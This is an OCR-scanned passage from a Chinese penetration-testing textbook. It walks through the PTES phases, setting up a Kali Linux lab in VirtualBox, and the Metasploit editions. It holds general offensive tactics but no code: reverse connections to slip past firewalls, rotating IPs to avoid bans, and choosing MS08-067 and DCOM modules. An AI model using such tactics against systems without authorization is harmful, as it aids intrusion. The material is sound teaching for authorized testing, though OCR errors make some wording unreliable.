分 的 内 容 。 依 照 PTES 的 要 求 ， 下 图 给 出 了 渗透 测试 过 程 的 各 个 阶段 。 
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报告 阶段 前 期 交互 阶段 
后 渗透 攻击 阶段 信息 收集 阶段 
渗透 攻击 阶段 ”威胁 建 模 阶段 


请 参考 http://www.pentest-standard.org 网 站 ,了 解 如 何在 工作 环境 中 设置 硬件 和 渗透 测试 系统 
阶段 。 这 些 设置 都 是 进行 专业 渗透 测试 所 需要 的 。 


1.4 组 织 一 次 渗透 测试 


在 开始 先进 、 复 杂 的 Metasploit 攻 击 之 前 ， 必 须 先 适应 工作 环境 。 获 得 关于 工作 环境 的 信息 
是 一 个 很 关键 的 因素 ， 而 它 = 在 进行 汉 和 测试 之 前 就 开始 起 作用 了 。 在 开始 Metasploit 的 练习 之 前 ， 
先 来 了 解 一 下 渗透 测试 的 各 个 阶段 ， 看 看 一 个 专业 的 渗透 测试 是 如 何 组 织 的 。 


1.2 ”前 期 交互 阶段 


作为 渗透 测试 的 第 一 个 步骤 ， 前 期 交互 阶段 将 确定 客户 ( 可 能 是 一 个 公司 、 机 构 或 者 网 络 ) 
的 渗透 测试 的 关键 细节 。 这 一 切 都 是 在 与 客户 进行 商讨 之 后 决定 的 。 这 个 阶段 是 连接 客户 与 渗透 
测试 工程 师 的 桥梁 。 在 这 个 阶段 , 渗透 测试 工程 师 要 与 客户 进行 充分 的 交流 ， 以 便 客户 对 即将 开 
展 的 渗透 测试 会 对 他 的 网 络 或 者 服务 顺产 生 的 影响 有 足够 的 了 解 。 因 此 , 渗透 测试 工程 师 此 时 要 
以 一 个 客户 指导 者 的 身份 来 进行 这 一 阶段 的 工作 。 这 一 阶段 还 将 确定 渗透 测试 的 范围 、 目 标 以 及 
代表 客户 进行 测试 时 的 特殊 需求 ,例如 特殊 的 权限 、 关 键 系统 的 访问 许可 等 。 商 讨 的 范围 还 将 包 
括 渗透 测试 预期 对 测试 目标 所 产生 的 积极 效果 。 在 本 阶段 ， 需 要 商讨 的 关键 点 如 下 所 示 。 
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口 渗透 测试 的 范围 : 这 一 部 分 需要 确定 渗透 测试 的 范围 并 预 估 整个 项 目的 工作 量 。 同 时 要 确 
定 哪些 目标 在 渗透 测试 范围 内 ， 哪 些 是 不 允许 进行 渗透 测试 的 。 测 试 者 要 确认 渗透 区 域 
内 涉及 的 下 地 址 范围 和 域名 范围 ， 以 及 采用 的 测试 类 型 〈 黑 盒 测 试 或 白 盒 测试 )。 比 如 ， 
当 进 行 白 盒 测试 时 ， 会 给 予 测试 者 哪些 权限 ， 是 否 可 以 对 目标 管理 人 员 开展 问卷 调查 ， 
在 什么 时 间 段 可 以 开展 渗透 测试 ， 是 否 能 对 目标 环境 进行 网 络 流量 压力 测试 ， 以 及 商定 本 
次 渗透 测试 的 费用 以 及 支付 条 款 。 关 于 渗透 范围 的 常规 文档 应 该 包含 了 如 下 问题 的 答案 。 


m 目标 组 织 最 大 的 安全 问题 是 什么 ? 

应 该 对 哪些 主机 、 网 络 地 址 范围 或 者 应 用 程序 进行 测试 ? 

在 测试 时 ， 应 该 将 哪些 主机 、 网 络 地 址 范围 或 者 应 用 程序 排除 在 测试 范围 之 外 ? 

在 测试 范围 内 是 否 存在 第 三 方 系统 或 者 网 络 ” 它们 拥有 了 哪些 系统 ( 在 渗透 前 是 否 需 
要 获得 目标 组 织 的 书面 许可 ) ? 

渗透 测试 是 在 现场 实地 环境 中 进行 还 是 在 虚拟 测试 环境 中 进行 ? 

渗透 测试 是 否 包 括 以 下 测试 技术 : 使 用 ping 对 网 络 范围 进行 扫描 、 对 目标 主机 进行 端口 
扫描 、 对 目标 进行 漏洞 扫描 、 对 目标 进行 渗透 测试 、 应 用 程序 级 的 操作 、 客 户 端 
Java/ActiveX 逆 向 功能 、 物 理 渗透 尝试 、 社 会 工程 学 。 

m 渗透 测试 是 否 包括 内 部 网 络 测试 ?如 果 包 括 的 话 ， 如 何 获取 权限 ? 

mu 客户 端 /终端 用 户 系 统 是 否 包 含 在 测试 范围 内 ?” 如 果 包 含 的 话 ， 将 会 涉及 多 少 客户 ? 

和 是否 允许 使 用 社会 工程 学 手段 ? 如 果 人 允许 的 话 ， 如 何 使 用 ? 
n 

n 


是 否 允 许 使 用 拒绝 服务 攻击 ? 
是 否 可 以 使 用 具有 破坏 性 的 检查 手段 和 渗透 模块 ? 
口 渗透 测试 的 目标 : 这 一 部 分 要 商定 本 次 渗透 测试 预期 达到 的 主要 和 次 要 效果 。 有 关 渗 透 
目标 的 常见 问题 列举 如 下 。 
mu 这 次 渗透 测试 的 商业 需求 是 什么 ? 
- 出 于 审计 和 标准 化 的 目的 
- 积极 主动 的 内 部 决策 以 确定 所 有 弱点 
m 目标 是 什么 ? 
- 列 出 目标 的 各 种 漏洞 
- 证 明 各 种 漏洞 的 存在 
- 测试 各 种 事件 响应 
- 对 网 络 、 系 统 或 者 应 用 程序 漏洞 的 渗透 模块 开发 
- 以 上 全 部 
a 渗透 测试 用 到 的 术语 和 定义 : 这 一 部 分 要 向 客户 介绍 整个 测试 过 程 中 出 现 的 专业 术语 和 
定义 ， 以 便 客户 能 够 更 好 地 理解 整个 渗透 测试 工作 。 
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口 渗透 测试 的 规定 : 这 一 部 分 要 商定 完成 渗透 测试 的 工期 ， 具 体 工作 展开 的 进度 表 ， 渗 透 
攻击 的 授权 许可 ， 以 及 定期 召开 会 议 以 跟 进 渗透 测试 进程 中 出 现 的 各 种 情况 。 有 关 约 定 
规则 的 常见 问题 列举 如 下 。 


m 希望 在 什么 时 候 执行 这 些 测试 ? 


- 在 工作 时 间 
- 下 班 之 后 
- 在 周末 
- 在 系统 维护 期 间 
m 这 个 测试 是 在 生产 环境 下 进行 的 吗 ? 
m 如 果 生 产 环境 不 能 受到 影响 ， 是 否 存在 类 似 的 环境 ( 开发 或 者 测试 系统 ) 可 以 用 来 进 
行 渗透 测试 ? 
mu 谁 是 技术 要 点 的 联系 人 ? 
如 果 想 获得 关于 前 期 交互 的 更 多 信息 ， 请 访问 网 址 http:/www.pentest-standard.org/index.php/ 
Intelligence Gathering. 


1.3 ”信息 收集 /侦查 阶段 


在 信息 收集 阶段 ， 你 需要 尽 可 能 采用 各 种 方式 来 收集 目标 网 络 的 所 有 信息 。 这 个 目标 网 络 可 
能 是 互联 网 的 一 个 网 站 ， 或 者 是 一 个 社会 性 的 组 织 ， 甚 至 可 能 是 一 个 财力 雄厚 的 老牌 商业 公司 。 
在 这 个 阶段 ， 最 重要 的 是 要 通过 各 种 社交 媒体 网 络 来 收集 相关 信息 ， 以 及 使 用 Google Hacking 技 
术 ( 一 种 使 用 特殊 的 查询 方法 通过 Google 搜 索引 擎 收集 敏感 信息 的 工具 ) 去 寻找 目标 的 相关 信息 。 
另外 ， 对 目标 使 用 主动 扫描 和 被 动 扫描 技术 进行 踩点 ( footprinting ) 也 是 一 种 可 行 的 办 法 。 


信息 收集 是 整个 渗透 测试 过 程 中 最 为 重要 的 阶段 之 一 。 与 尝试 所 有 可 行 的 渗透 测试 方法 相 
比 , 对 目标 有 适当 的 了 解 可 以 让 测试 者 选择 合适 和 准确 的 渗透 测试 攻击 方式 。 这样 做 将 会 大 大 缩 
短 整个 渗透 测试 耗费 的 时 间 。 通 常 这 个 阶段 会 占 到 整个 渗透 测试 所 需 时 间 的 40%~60%。 最 终 能 
否 成 功 渗透 进入 目标 网 络 很 大 程度 上 取决 于 测试 者 在 这 个 阶段 的 工作 成 果 。 


作为 一 名 渗透 测试 工程 师 , 必须 要 把 通过 对 目标 网 络 进行 各 种 扫描 以 获得 足够 的 信息 作为 自 
己 的 职责 。 扫描 目标 计算 机 上 运行 的 服务 、 开 放 的 端口 , 以 及 验证 这 些 端口 上 运行 着 的 全 部 服务 ， 
然后 判断 这 些 服务 中 哪些 是 可 以 被 攻击 的 ， 并 且 决 定 如 何 利用 它们 作为 人 侵 目标 的 通道 。 

其 次 ， 在 这 个 阶段 还 要 明确 目标 网 络 当前 部 署 的 安全 控制 措施 以 及 如 何 才 能 破坏 这 些 措 施 。 


接 下 来 用 一 个 示例 来 讨论 这 一 点 。 设 想 这 里 有 一 个 针对 Web 服 务 絮 的 黑 盒 测试 ， 客户 希望 进 
行 网 络 流量 压力 测试 。 
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我 们 将 对 服务 器 进行 网 络 流量 压力 测试 以 判断 目标 的 抗 流量 压力 水 平 。 简 言 之 ,就 是 服务 器 
对 拒绝 服务 (Denial of Service, Dos ) 攻击 的 应 对 能 力 。DoS 攻 击 或 网 络 流量 压力 测试 指 的 是 向 
目标 服务 器 发 送 数量 极为 巨大 的 网 络 请 求 或 数据 ， 其 目的 是 检测 目标 服务 器 在 面 对 此 类 情形 时 ， 
是 能 够 继续 正常 工作 还 是 因 资 源 耗 尽 而 拒绝 服务 。 为 了 实现 这 个 目标 , 我 们 启动 网 络 压力 测试 工 
R., 并 对 目标 网 站 发 起 一 次 攻击 。 然 而 , 在 攻击 发 起 之 后 的 几 秒 ， 服 务 器 端 就 不 再 响应 我 们 的 客 
户 端 请 求 ， 从 Web 客 户 端 也 无 法 打开 目标 服务 器 的 Web 页 面 。 此 外 ,浏览 器 上 还 会 显示 目标 Web 
页 面 已 经 不 在 线 的 提示 。 这 是 怎么 回 事 呢 ?7 是 我 们 已 经 成 功 搞 掉 了 目标 服务 器 吗 ? 可惜 的 是 , 并 
非 如 此 。 事 实 上 , 这 表明 目标 服务 器 存在 保护 机 制 。 由 于 目标 服务 器 的 管理 人 员 事 先 设置 的 保护 
机 制 发 现 了 恶意 攻击 的 企图 ， 从 而 禁止 了 从 我 们 的 人 P 地 址 发 起 的 后 续 访 问 请 求 。 在 发 起 攻击 前 必 
须 准 确 地 收集 目标 信息 以 及 验证 目标 提供 的 各 种 网 络 服务 。 


因此 ， 利 用 多 个 不 同 的 耳 地 址 对 目标 Web 服 务 顺 进行 测试 是 更 好 的 选择 。 在 测试 时 使 用 两 到 
三 个 不 同 的 虚拟 专用 服务 器 是 一 种 值得 推荐 的 做 法 。 另 外 , 我 建议 在 使 用 攻击 模块 对 真实 目标 进 
行 渗透 测试 前 ,在 虚拟 环境 下 对 所 有 的 攻击 模块 进行 模拟 测试 。 一 个 正确 的 、 关 于 攻击 的 模拟 验 
证 是 必需 的 。 如 果 没 有 进行 模拟 测试 就 开展 了 渗透 测试 , 那么 很 有 可 能 攻击 模块 会 直接 导致 目标 
服务 崩 演 ， 而 这 并 不 是 我 们 所 期 望 见 到 的 。 网 络 压力 测试 通常 应 该 在 业务 未 期 或 者 维护 期 进行 。 
此 外 ， 将 用 于 测试 客户 端的 卫 列 在 白 名 单 中 也 是 十 分 重要 的 。 


现在 来 看 第 二 个 示例 一 一 一 次 对 Windows 2012 服 务 右 的 黑 盒 测试 ,在 对 目标 服务 器 进行 扫描 
的 过 程 中 , 我 们 发 现 其 80 端 口 和 8080 端 口 都 是 开放 的 。 在 80 端 口上 运行 着 最 新 版 的 互联 网 信息 服 
$ (Internet Information Services, IIS )， 在 8080 端 口上 运行 着 存在 漏洞 的 Rejetto HFS 服 务 器 ， 而 
Rejetto HFS 服 务 器 容易 受到 远程 代码 执行 ( Remote Code Execution, RCE ) 漏洞 的 攻击 。 


然而 ， 当 我 们 试图 利用 这 个 有 漏洞 的 HFS 进 行 渗透 的 时 候 ， 却 发 现 渗透 失败 了 。 这 是 一 种 很 
常见 的 情景 ， 因 为 来 目 外 部 的 恶意 流量 可 能 在 防火 墙 处 被 拦截 了 。 


若 遇 到 这 种 情况 ,可 以 简单 地 改变 人 侵 的 方式 ,让 目标 服务 器 主动 建立 到 我 们 的 连接 ， 而 不 
是 由 我 们 去 连接 目标 服务 器 。 这 种 方法 更 容易 成 功 , 因为 防火 墙 通常 会 被 配置 为 检测 人 站 流量 而 


不 是 出 站 流量 。 
现在 回 到 信息 收集 阶段 ， 这 一 阶段 涉及 的 步 又 如 下 。 


O 目标 选择 : 选择 攻击 的 目标 ， 确 定 攻 击 达 到 的 效果 以 及 整个 攻击 过 程 花费 的 时 间 。 

口 隐私 收集 : 包括 现场 信息 采集 ， 检 查 使 用 的 设备 信息 ， 甚 至 从 丢弃 的 废品 中 收集 信息 。 
此 外 ， 它 还 包含 了 目标 单位 外 部 的 信息 收集 ， 例 如 识别 目标 单位 所 使 用 的 数据 仓库 。 通 
常 这 个 阶段 在 日 盒 测试 时 进行 。 

口 踩点 工作 : 包含 针对 目标 的 主动 和 被 动 扫 描 技 术 ， 例 如 网 络 端 口 扫描 、banner 获 取 等 。 

a 验证 目标 的 安全 机 制 : 包含 防火 墙 、 网 络 流量 过 滤 系 统 、 网 络 和 主机 的 保护 措施 的 确认 

工作 等 。 
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如 果 想 获得 关于 信息 收集 的 更 多 信息 ， 请 访问 网 址 http://www.pentest-standard. 
org/index.php/Intelligence Gathering; 
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大 多 数 时 候 ， 当 渗透 测试 工程 师 开 始 进行 渗透 的 时 候 ， 他 们 已 经 明确 下 一 步 要 做 什么 了 。 这 
意味 着 如 果 他 们 看 到 一 个 Windows 操 作 系 统 在 运行 ， 将 会 选择 专门 针对 Windows 操 作 系 统 的 渗透 
模块 ( exploit )。 以 一 个 针对 NETAPI 服 务 漏洞 的 渗透 模块 为 例 ， 由 于 Windows XP 操作 系统 普遍 
存在 这 个 漏洞 ， 这 个 模块 就 是 一 个 极 佳 的 选择 。 假 设 这样 一 种 情形 ,渗透 测试 工程 师 需 要 访问 一 
个 组 织 。 在 访问 开始 之 前 ,他 已 经 知道 了 该 机 构 所 使 用 的 计算 机 中 约 有 90% 使 用 了 微软 的 Windows 
XP 操作 系统 ， 还 有 一 些 使 用 了 Windows 2000 Server 操 作 系 统 。 他 此 时 就 可 以 打 定 主意 ， 采 用 
Metasploit 框 架 中 针对 NETAPI 服 务 漏洞 的 渗透 模块 , 对 那些 安装 了 Windows XP 的 计算 机 进行 渗透 
测试 ， 另 外 选用 针对 DCOM 漏 洞 的 模块 对 Windows 2000 Server 进 行 渗透 测试 。 我 们 也 将 在 本 章 后 
面 演示 如 何在 实际 中 利用 这 些 漏洞 。 


接 下 来 考虑 另 一 个 关于 Web 服 务 器 的 白 盒 测试 ， 在 这 台 服 务 器 上 运行 的 网 站 中 的 页 面 都 
是 .asp 或 者 .aspx 类 型 。 在 这 种 情况 下 ， 我 们 可 以 选择 针对 Windows 的 渗透 模块 和 针对 微软 的 测试 
工具 。 男 外 ， 在 这 次 测试 中 我 们 就 不 用 考虑 针对 Linux 操 作 系 统 的 渗透 模块 和 测试 工具 了 。 


因此 ， 对 目标 测试 环境 的 了 解 降低 了 接 下 来 对 客户 的 测试 难度 。 


如 果 想 获得 关于 NETAPI 的 更 多 信息 ， 请 访问 网 址 http://technet.microsoft.com/ 


qp en-us/security/bulletin/ms08-067 ~ 
如 果 想 获得 关于 DCOM 的 更 多 信息 ， 请 访问 网 址 http://www.rapid7.com/db/ 
modules/exploit/Windows/dcerpc/ms03 026 dcom。 


1.4.1 威胁 建 模 阶段 


为 了 保证 我 们 的 渗透 测试 能 够 正确 进行 ,必须 进行 威胁 建 模 。 在 这 个 阶段 ， 主 要 的 工作 是 模拟 
出 对 目标 准确 的 威胁 以 及 这 些 威胁 的 作用 ， 并 根据 这 些 威胁 可 能 对 目标 产生 的 影响 对 其 进行 分 类 。 
根据 之 前 在 信息 收集 阶段 作出 的 分 析 ， 在 这 个 阶段 我 们 可 以 确定 最 佳 的 攻击 方式 。 威 胁 建 模 方法 适 
用 于 商业 资产 分 析 、 过 程 分 析 、 威 胁 分 析 以 及 威胁 能 力 分 析 。 这 一 阶段 将 解决 以 下 问题 。 


口 如 何 攻击 指定 的 网 络 ? 

口 需要 获得 的 重要 信息 是 什么 ? 

口 在 攻击 时 采取 什么 方法 最 为 合适 ? 
口 对 目标 来 说 最 大 的 安全 威胁 是 什么 ? 
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威胁 建 模 将 有 助 于 渗透 测试 工程 师 完 成 以 下 一 系列 工作 。 


口 收集 有 关 高 等 级 威胁 的 相关 文档 。 
口 根据 基本 的 分 类 方法 对 组 织 的 资源 进行 标识 。 
口 对 威胁 进行 识别 和 分 类 。 
口 将 组 织 的 资源 映射 成 模型 。 

威胁 建 模 将 有 助 于 明确 哪些 资源 最 容易 受到 威胁 ， 以 及 这 些 威 胁 各 自 是 什么 。 

现在 来 讨论 第 三 个 例子 , 假定 现在 有 一 个 针对 公司 网 站 的 黑 盒 测试 。 目标 公 司 的 客户 信息 是 
公司 的 重要 资产 。 然 而 , 在 同一 后 台 程 序 的 另 一 个 数据 库 中 保存 了 客户 交易 的 记录 。 在 这 种 情形 
下 ,攻击 者 就 可 能 利用 SQL 注入 漏洞 获取 客户 交易 的 记录 ， 而 交易 记录 属于 其 他 资产 。 因 此 在 这 
个 阶段 ， 应 该 建立 一 个 针对 重要 资产 和 其 他 资产 的 SQL 注入 漏洞 威胁 模型 。 

漏洞 扫描 工具 ( 例如 Nexpose 和 Metasploit Pro 版 ) 可 以 帮助 我 们 以 自动 化 的 方式 快速 清晰 地 
完成 威胁 建 模 。 在 开展 大 规模 的 测试 时 ， 这 个 优势 更 为 明显 。 


如 果 想 获取 关于 威胁 建 模 的 更 多 信息 ， 请 访问 网 址 http:/www.pentest- 
standard.org/index.php/Threat Modeling。 


1.4.2. ”漏洞 分 析 阶 段 


漏洞 分 析 是 在 一 个 系统 或 者 一 个 应 用 程序 中 发 现 漏洞 的 过 程 。 这些 漏 洞 多 种 多 样 , 涵盖 了 很 
多 方面 , 从 服务 器 的 配置 到 Web 程 序 服务 ， 从 应 用 程序 到 数据 库 服务 , 从 一 个 基于 VOIP 的 服务 器 
到 基于 SCADA 的 服务 都 可 能 存在 漏洞 。 在 这 个 阶段 包含 了 三 个 不 同 的 机 制 ， 那 就 是 测试 、 验 证 
和 研究 。 测 试 包括 主动 测试 和 被 动 测试 。 验 证 包括 去 除 误 报 和 通过 手动 验证 确认 漏洞 的 存在 。 研 
究 指 的 是 发 现 并 触发 漏洞 以 确认 它 的 存在 。 


QD 有 关 威 胁 建 模 阶 段 的 各 个 过 程 的 更 多 信息 ， 请 访问 http:/www.pentest- 
standard.org/index.php/vulnerability analysis; 


1.4.3 ”渗透 阶段 和 后 渗透 阶段 


渗透 攻击 阶段 可 以 利用 之 前 漏洞 分 析 阶 段 的 成 果 。 这 个 阶段 一 般 被 认为 是 真正 的 攻击 阶段 。 
在 这 个 阶段 , 渗透 测试 者 可 以 针对 目标 系统 的 漏洞 使 用 对 应 的 入 侵 模块 获得 控制 权限 。 本 书 主要 


介绍 的 就 是 这 个 阶段 。 


后 渗透 阶段 发 生 在 渗透 阶段 之 后 , 这 个 阶段 包含 了 当成 功 渗透 攻击 到 对 方 计算 机 以 后 的 很 多 
任务 ， 比 如 提升 权限 、 上 传 和 下 载 文件 、 跳 板 攻 击 ， 等 等 。 
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有 关 渗 透 阶段 各 个 过 程 的 详细 信息 ， 请 访问 http:W/www.pentest-standard.org/ ET 
qp index.php/Exploitation., 

有 关 后 渗透 阶段 的 更 多 信息 ,请 访问 http:/www.pentest-standard.org/index.php/ 
Post Exploitation 。 


1.4.4 报告 阶段 


在 进行 渗透 测试 时 , 创建 整个 渗透 测试 的 正式 报告 是 在 最 后 一 个 阶段 进行 的 。 渗 透 测试 报告 
的 重要 组 成 部 分 包括 : 确定 目标 最 为 重要 的 威胁 ,将 渗透 得 到 的 数据 生成 表格 和 图 表 ，, 对 目标 系 
统 的 改进 建议 , 以 及 这 些 问 题 的 修复 方案 。 在 本 书 的 后 半 部 分 , 将 会 用 一 节 来 详细 描述 如 何 编 写 
渗透 测试 报告 。 


qp 有 关 报 告 阶段 各 个 过 程 的 详细 信息 ， 请 访问 http://www.pentest-standard.org/ 
index.php/reporting o 


1.4.5 “工作 环境 的 准备 


在 战争 开始 之 前 , 士兵 们 必须 确保 其 武器 装备 处 于 最 佳 状态 。 这 个 原则 也 正 是 我 们 要 遵循 的 。 
成 功 的 测试 环境 取决 于 你 的 测试 实验 室 是 如 何 配置 的 。 一 个 成 功 的 测试 需要 回答 以 下 问题 。 
口 测试 实验 室 的 配置 如 何 ? 
口 具备 所 有 必需 的 测试 工具 吗 ? 
口 硬件 是 否 足以 支持 这 些 工具 的 运行 ? 


在 开始 任何 测试 之 前 ， 必 须 确 保 所 有 的 工具 都 已 准备 就 绪 并 且 都 能 顺利 地 工作 。 


1.5 在 虚拟 环境 中 安装 Kali Linux 


在 开始 使 用 Metasploit 之 前 ， 需 要 有 一 个 测试 用 的 实验 环境 。 建 立 这 种 环境 最 好 的 办 法 就 是 
拥有 数目 众多 的 计算 机 ， 同 时 在 这 些 计 算 机 上 安装 不 同 的 操作 系统 。 然 而 , 如果 只 有 一 台 计 算 机 
的 话 ， 最 好 的 办 法 就 是 建立 一 个 虚拟 的 实验 环境 。 


虚拟 化 技术 在 如 今 的 渗透 测试 中 扮演 了 十 分 重要 的 角色 。 由 于 硬件 设备 的 价格 相对 昂贵 , R 
用 虚拟 化 技术 可 以 使 得 渗透 测试 经 济 有 效 。 在 一 台 计算 机 上 模拟 出 多 个 操作 系统 不 仅 可 以 节省 大 
量 成 本 , 同时 也 降低 了 电力 的 使 用 和 空间 的 占用 。 建立 一 个 虚拟 化 的 渗透 测试 环境 可 以 避免 对 你 
的 真实 主机 系统 进行 任何 修改 , 并 使 得 我 们 的 所 有 操作 都 在 一 个 独立 的 环境 中 进行 。 虚 拟 化 的 网 
络 环境 允许 你 的 渗透 测试 在 一 个 独立 的 虚拟 网 络 中 运行 , 从 而 无 须 使 用 或 者 修改 主机 系统 的 网 络 
人 硬件。 
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此 外 , 使 用 虚拟 化 技术 的 快照 功能 可 以 保存 虚拟 机 在 某 一 时 刻 的 状态 。 这 种 功能 相当 有 用 ， 
因为 在 我 们 进行 一 个 虚拟 测试 的 时 候 ， 可 以 随时 拿 系统 当前 的 状态 与 之 前 的 状态 进行 比较 ,也 
可 以 将 系统 随时 恢复 到 之 前 的 状态 , 这 样 如 果 文件 在 模拟 攻击 时 发 生 了 变化 就 无 须 再 重新 安装 
整个 软件 环境 了 。 主 机 系统 需要 拥有 足够 的 硬件 资源 〈 比如 RAM、 处 理 能 力 、 驱 动 器 空间 等 ) 
来 保证 虚拟 化 能 顺利 运行 。 


aD 有 关 快 照 的 更 多 信息 ， 请 访问 https:/www.virtualbox.org/manual/ch1.html#ksnapshots。 


现在 来 看 看 如 何 使 用 Kali 操 作 系 统 创建 一 个 虚拟 测试 环境 。Kali 是 全 世界 最 流行 的 渗透 操作 
系统 ， 该 系统 中 默认 安装 了 Metasploit。 


€d 可 以 从 以 下 网 址 下 载 用 于 VMware 和 VirtualBox 虚 拟 机 的 Kali Linux 预 建 镜像 : 


https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/, 


为 了 创建 虚拟 操作 系统 ， 需 要 支持 虚拟 化 的 仿真 软件 。 可 以 从 当前 最 为 流行 的 两 款 软件 
VirtualBox 和 VMware Player 中 选择 一 个 。 好 了 ， 可 以 按照 下 面 的 步骤 开始 安装 了 。 


(1) 在 VirtualBox 的 官方 网 站 ( http://www.virtualbox.org/wiki/Downloads ) 下 载 VirtualBox 安 装 
程序 。 在 下 载 的 时 候 要 注意 选择 与 工作 环境 匹配 的 版 本 。 


(2) 开始 运行 安装 程序 ， 直 到 系统 安装 工作 完成 。 


(3) 完成 了 安装 工作 之 后 就 可 以 启动 VirtualBox 程 序 。 运 行 效果 如 下 图 所 示 。 


Wf Oracle VM VirtualBox Manager [ E E) 
File Machine Help 
- ber » KA 29 Snapshots 


New Settings Discard Start, 
^ | Welcome to VirtualBox! 


The left part of this window is a list of all virtual machines on your computer. 
The list is empty now because you haven't created any virtual machines yet. 


New button in the main tool bar located at the top Pos # 
of the window. 


In order to create a new virtual machine, press the & e" X 
P hs 


n 


You can press the F1 key to get instant help, or visit 区 
www.virtualbox.org for the latest information and < A 


news. `M 
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(4) 在 Name 文 本 框 字段 中 为 新 建立 的 操作 系统 输入 一 个 合适 的 名 称 。 然 后 选择 operating EESTI 


system 类 型 和 Version 。 
(5) 现在 要 安装 一 个 新 的 操作 系统 ， 首 先 在 工具 栏 中 选择 New。 


O 对 于 Kali Linux 而 言 ， 需 要 将 操作 系统 的 类 型 选择 为 Linux， 版 本 选择 为 Linux 2.6/3.x/4.x. 
口 设置 完成 以 后 的 界面 如 下 图 所 示 。 


? x 
-reate Virtual Machine 
Name and operating system 
Name: |Kali Linux 
Type: |Linux M EA 
(.2.6 
Version: Linux 2.6 / 3.x / 4.x (64-bit) 7 c—À 
Memory size 
Ü | 1024| |*| MB 
4 MB 16384 MB 
Hard disk 
(O Do not add a virtual hard disk 
(8) Create a virtual hard disk now 
(O Use an existing virtual hard disk file 
Metasploitable.vmdk (Normal, 8.00 GB) * 


Guided Mode Cancel 


(6) 设置 分 配给 这 个 虚拟 系统 运行 时 需要 的 内 存 。 如 果 是 Kali Linux 的 话 ， 则 至 少 要 分 配 1 GB 
的 系统 内 存 。 

CT) 接 下 来 要 给 虚拟 系统 分 配 物 理 硬盘 空间 作为 虚拟 系统 的 硬盘 。 在 创建 虚拟 硬盘 的 时 候 要 
选择 dynamically allocated disk 选 项 。 选 择 这 个 选项 的 好 处 就 是 物理 机 所 提供 的 硬盘 空间 可 以 随 着 
虚拟 系统 占用 空间 的 增长 而 变 大 ， 这 样 就 不 必 一 次 性 分 配给 虚拟 系统 大 量 的 硬盘 资源 。 

(8) 然后 设置 分 配给 虚拟 系统 的 虚拟 硬盘 初始 大 小 ， 在 这 里 设置 为 10 GB 就 足够 了 。 

(9) 现在 可 以 单 击 Create 按 钮 来 创建 虚拟 磁盘 了 。 

(10) 单 击 Start 按 钮 开始 运行 虚拟 系统 。 第 一 次 运行 时 ， 通 常会 弹出 一 个 窗口 ， 显 示 这 是 第 一 
次 运行 。 在 路 径 选 择 对 话 框 中 为 Kali 的 .iso 文 件 设置 好 在 硬盘 上 的 位 置 之 后 , 单 击 Start 按 钮 继续 安 
装 过程 。 这 个 过 程 如 下 图 所 示 。 


x 


Select start-up dis! 


Please select a virtual optical disk file or a physical optical 
drive containing a disk to start your new virtual machine from. 


The disk should be suitable for starting a computer from and 
should contain the operating system you wish to install on the 
virtual machine if you want to do that now. The disk will be 
ejected from the virtual drive automatically next time you 
switch the virtual machine off, but you can also do this 
yourself if needed using the Devices menu. 


kali-linux-2.0-amd64.iso (3.09 GB) 


D ou gm dpi)» E Rigtoa ,| 


你 可 以 以 Live 模 式 运 行 Kali Linux , 或 者 使 用 Graphical Install/Install 将 系统 永久 安装 在 硬盘 上 ， 


这 一 选择 界面 如 同 下 


图 所 示 。 


3 Kali Linux [Running] - Oracle VM VirtualBox 9 口 x 
File Machine View Input Devices Help 


KAL 


^the quieter you become, the more you are able to hear" 


Boot menu 


Live (amd64) 

Live (amd64 failsafe) 

L (foren: mode) 

L USB- Pe: stence (check kali .org/p. 
Live USB Encrypted Persistence (heck kali .org/p 
Install 

Graphical install 

Install with speech synthesis 

Advanced options 


.S (B) Right Ctrl 
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A XKali Linux 的 完整 安装 指导 ， 请 访问 http:/docs.kali.org/category/installation . 


如 需 通过 命令 行 在 Linux 系 统 上 安装 Metasploit ， 请 访问 http:/www.darkoperator. 
QD com/installing-metasploit-in-ubunt/ ; 
Jv 4 Æ Windows 4& 4E & £t E 4 x Metasploit, ， 请 访问 以 下 网 址 的 教程 : https:// 
community.rapid7.convservlet/JiveServlet/downloadBody/299-12-11-6553/windows-installation- 
guide.pdf, 


1.6 Metasploit 基础 


到 现在 为 止 我 们 已 经 回顾 了 渗透 测试 的 基础 内 容 ， 也 完成 了 Kali Linux 的 建立 。 接 下 来 介绍 
一 下 重点 部 分 : Metasploit。Metasploit 是 一 种 安全 框架 ， 为 渗透 测试 工程 师 提供 了 大 量 的 渗透 模 
块 和 扫描 模块 。 20034EH.D Moore 创 建 了 Metasploit， 从 那 之 后 Metasploit 便 快速 发 展 起 来 ， 如 今 被 
公认 是 最 为 流行 的 渗透 测试 工具 之 一 。Metasploit 是 一 个 完全 的 Ruby 驱 动 项 目 ， 提 供 了 大 量 的 漏 
洞 渗 透 、 攻 击 载荷 (payload )、 编 码 技术 以 及 后 渗透 模块 。 


Metasploit 提 供 了 以 下 多 种 版 本 。 


口 Metasploit Pro 版 : 这 是 Metasploit 的 一 个 商业 化 版 本 ， 提 供 了 大 量 的 功能 ， 例 如 Web 应 用 
程序 扫描 工具 、 杀 毒 软件 绕 过 工具 、 自 动 化 渗透 工具 , 十 分 适合 专业 渗透 测试 工程 师 和 IT 
安全 团队 使 用 。Pro 版 通常 用 来 实现 高 级 渗透 测试 和 企业 安全 项 目 。 

口 Metasploit Express 版 : 这 是 一 个 为 初级 渗透 测试 工程 师 设 计 的 版 本 。 这 个 版 本 中 的 
Metasploit 包 含 了 智能 化 渗透 、 密 码 的 自动 化 暴力 破解 等 功能 ， 十 分 适合 中 小 型 企业 的 IT 
安全 团队 使 用 。 

口 Metasploit Community 版 : 这 是 Metasploit Express 精 简 后 的 免费 版 本 。 对 于 小 企业 和 学 生 

来 说 这 是 一 个 不 错 的 选择 。 

口 Metasploit Framework 版 : 这 是 一 个 完全 在 命令 行 中 运行 的 版 本 。 这 个 版 本 的 所 有 任务 都 在 
命令 行 下 完成 , 比如 说 手工 渗透 、 第 三 方 模块 导入 等 。 该 版 本 适合 开发 人 员 和 安全 研究 人 员 。 

本 书 中 采用 的 是 Metasploit Community 版 和 Framework 版 。Metasploit 还 提供 了 下 面 几 种 类 型 

的 用 户 界面 。 


DGUI (Graphical User Interface) 界面 : 在 图 形 化 工作 模式 下 ， 往 往 轻 点 一 下 鼠标 就 能 完 

成 所 有 的 任务 。 这 种 工作 方式 提供 了 友好 的 操作 模式 和 简单 快捷 的 漏洞 管理 方式 。 

